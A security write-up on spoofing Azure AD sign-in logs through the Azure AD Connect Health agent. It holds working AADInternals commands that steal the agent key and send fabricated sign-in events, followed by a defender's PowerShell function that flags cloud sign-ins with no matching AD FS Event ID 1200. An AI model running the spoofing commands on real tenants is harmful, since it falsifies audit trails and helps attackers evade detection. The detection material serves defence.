Spoofing Azure Sign-In Logs

In hybrid environments, an attacker with local administrator rights on a server running the Azure AD Connect Health agent (typically the AD FS or Azure AD Connect server) can spoof Azure AD sign-in events, and an attacker with Global Administrator permissions can register fake agents to Azure AD. The technique can be used both to conceal the attacker's own tracks and IOCs among fabricated events and to add further "noise" that distracts and misleads blue team operators.

Azure AD Connect Health is an agent that monitors the health of the on-prem identity infrastructure (AD FS, Azure AD Connect) and its connection to the cloud. The AD FS flavour of the agent also reads the on-prem Security event log for AD FS auditing events: each time AD FS issues a token (Event ID 1200, "The Federation Service issued a valid token"), the agent uploads the corresponding sign-in to Azure AD, where it shows up in the Azure AD sign-in logs. The cloud side accepts whatever an authenticated agent reports, and that trust is what this technique abuses.

The following is a diagram of the authentication flow

To perform this attack we need the Agent Key of a registered AAD Connect Health agent. AADInternals reads it from the server where the agent is installed, which is why local administrator rights on that server are required:

PS /home/otter> $agentInfo = Get-AADIntHybridHealthServiceAgentInfo

With the agent information in hand we can craft arbitrary sign-in events (UPN, source IP address, network location) and send them to Azure AD as if the agent had read them from the AD FS Security log:

PS /home/otter> $events = @(
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter1@minions.com" -IPAddress "1.1.1.1" -NetworkLocationType Extranet
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter2@minions.com" -IPAddress "2.2.2.2" -NetworkLocationType Extranet
>> )
PS /home/otter> Send-AADIntHybridHealthServiceEvents -AgentInfo $agentInfo -Events $events -Verbose
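The check a defender wants after reading the above is to correlate the cloud copy against its supposed source: a genuine entry has an Event ID 1200 behind it on the AD FS server, a spoofed one does not. The following PowerShell is an added example, not code from this page or from AADInternals. It assumes the cloud sign-ins were exported with the properties UserPrincipalName, IPAddress and CreatedDateTime, and that the on-prem 1200 events were already parsed into Upn, IpAddress and TimeCreated (both sets of names are assumptions); the input data is constructed.

```powershell
# Added example (not from the original page or from AADInternals): report Azure AD
# sign-in entries for which no on-prem AD FS Event ID 1200 exists. Property names on
# both inputs are assumptions, and the sample data at the bottom is constructed.

function Find-UnmatchedCloudSignIns {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [object[]] $CloudSignIns,   # exported Azure AD sign-in records
        [Parameter(Mandatory)] [object[]] $OnPremEvents,   # parsed AD FS 1200 events
        [int] $WindowSeconds = 300                         # tolerated clock/upload skew
    )

    # Index on-prem events by UPN (case-insensitive) so each cloud record is a cheap lookup.
    $index = @{}
    foreach ($e in $OnPremEvents) {
        $key = $e.Upn.ToLowerInvariant()
        if (-not $index.ContainsKey($key)) {
            $index[$key] = New-Object System.Collections.Generic.List[object]
        }
        $index[$key].Add($e)
    }

    foreach ($c in $CloudSignIns) {
        $key = $c.UserPrincipalName.ToLowerInvariant()
        $matched = $false
        if ($index.ContainsKey($key)) {
            foreach ($e in $index[$key]) {
                $delta = [math]::Abs(($c.CreatedDateTime - $e.TimeCreated).TotalSeconds)
                # Same user, same source IP, and close enough in time counts as the same sign-in.
                if ($e.IpAddress -eq $c.IPAddress -and $delta -le $WindowSeconds) {
                    $matched = $true
                    break
                }
            }
        }
        if (-not $matched) {
            if ($index.ContainsKey($key)) {
                $reason = 'UPN seen on-prem, but no 1200 event with matching IP and time'
            } else {
                $reason = 'UPN never appears in the on-prem AD FS audit log'
            }
            # Cloud-only sign-ins are spoofing candidates; a purged on-prem log looks the same.
            [pscustomobject]@{
                UserPrincipalName = $c.UserPrincipalName
                IPAddress         = $c.IPAddress
                CreatedDateTime   = $c.CreatedDateTime
                Reason            = $reason
            }
        }
    }
}

# Constructed sample data: one real sign-in known to both sides, plus two cloud-only
# entries of the kind Send-AADIntHybridHealthServiceEvents produces.
$t0 = [datetime]::Parse('2024-01-15T08:00:00Z').ToUniversalTime()
$onPrem = @(
    [pscustomobject]@{ Upn = 'alice@minions.com'; IpAddress = '203.0.113.10'; TimeCreated = $t0 }
)
$cloud = @(
    [pscustomobject]@{ UserPrincipalName = 'Alice@minions.com';  IPAddress = '203.0.113.10'; CreatedDateTime = $t0.AddSeconds(40) }
    [pscustomobject]@{ UserPrincipalName = 'otter1@minions.com'; IPAddress = '1.1.1.1';      CreatedDateTime = $t0.AddMinutes(5) }
    [pscustomobject]@{ UserPrincipalName = 'otter2@minions.com'; IPAddress = '2.2.2.2';      CreatedDateTime = $t0.AddMinutes(5) }
)

# Only otter1 and otter2 are reported; Alice matches despite the UPN case difference.
Find-UnmatchedCloudSignIns -CloudSignIns $cloud -OnPremEvents $onPrem | Format-Table -AutoSize
```

In a real investigation the on-prem side comes from the AD FS server with auditing enabled, e.g. Get-WinEvent -FilterHashtable @{LogName='Security'; Id=1200}, and the cloud side from a sign-in log export; the UPN and client IP then have to be pulled out of the 1200 event's audit XML, which the example skips by taking already-parsed objects. Treat the result as a lead rather than proof: an attacker with local administrator rights on that same server could also have cleared the Security log, so a missing on-prem event is worth explaining either way.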
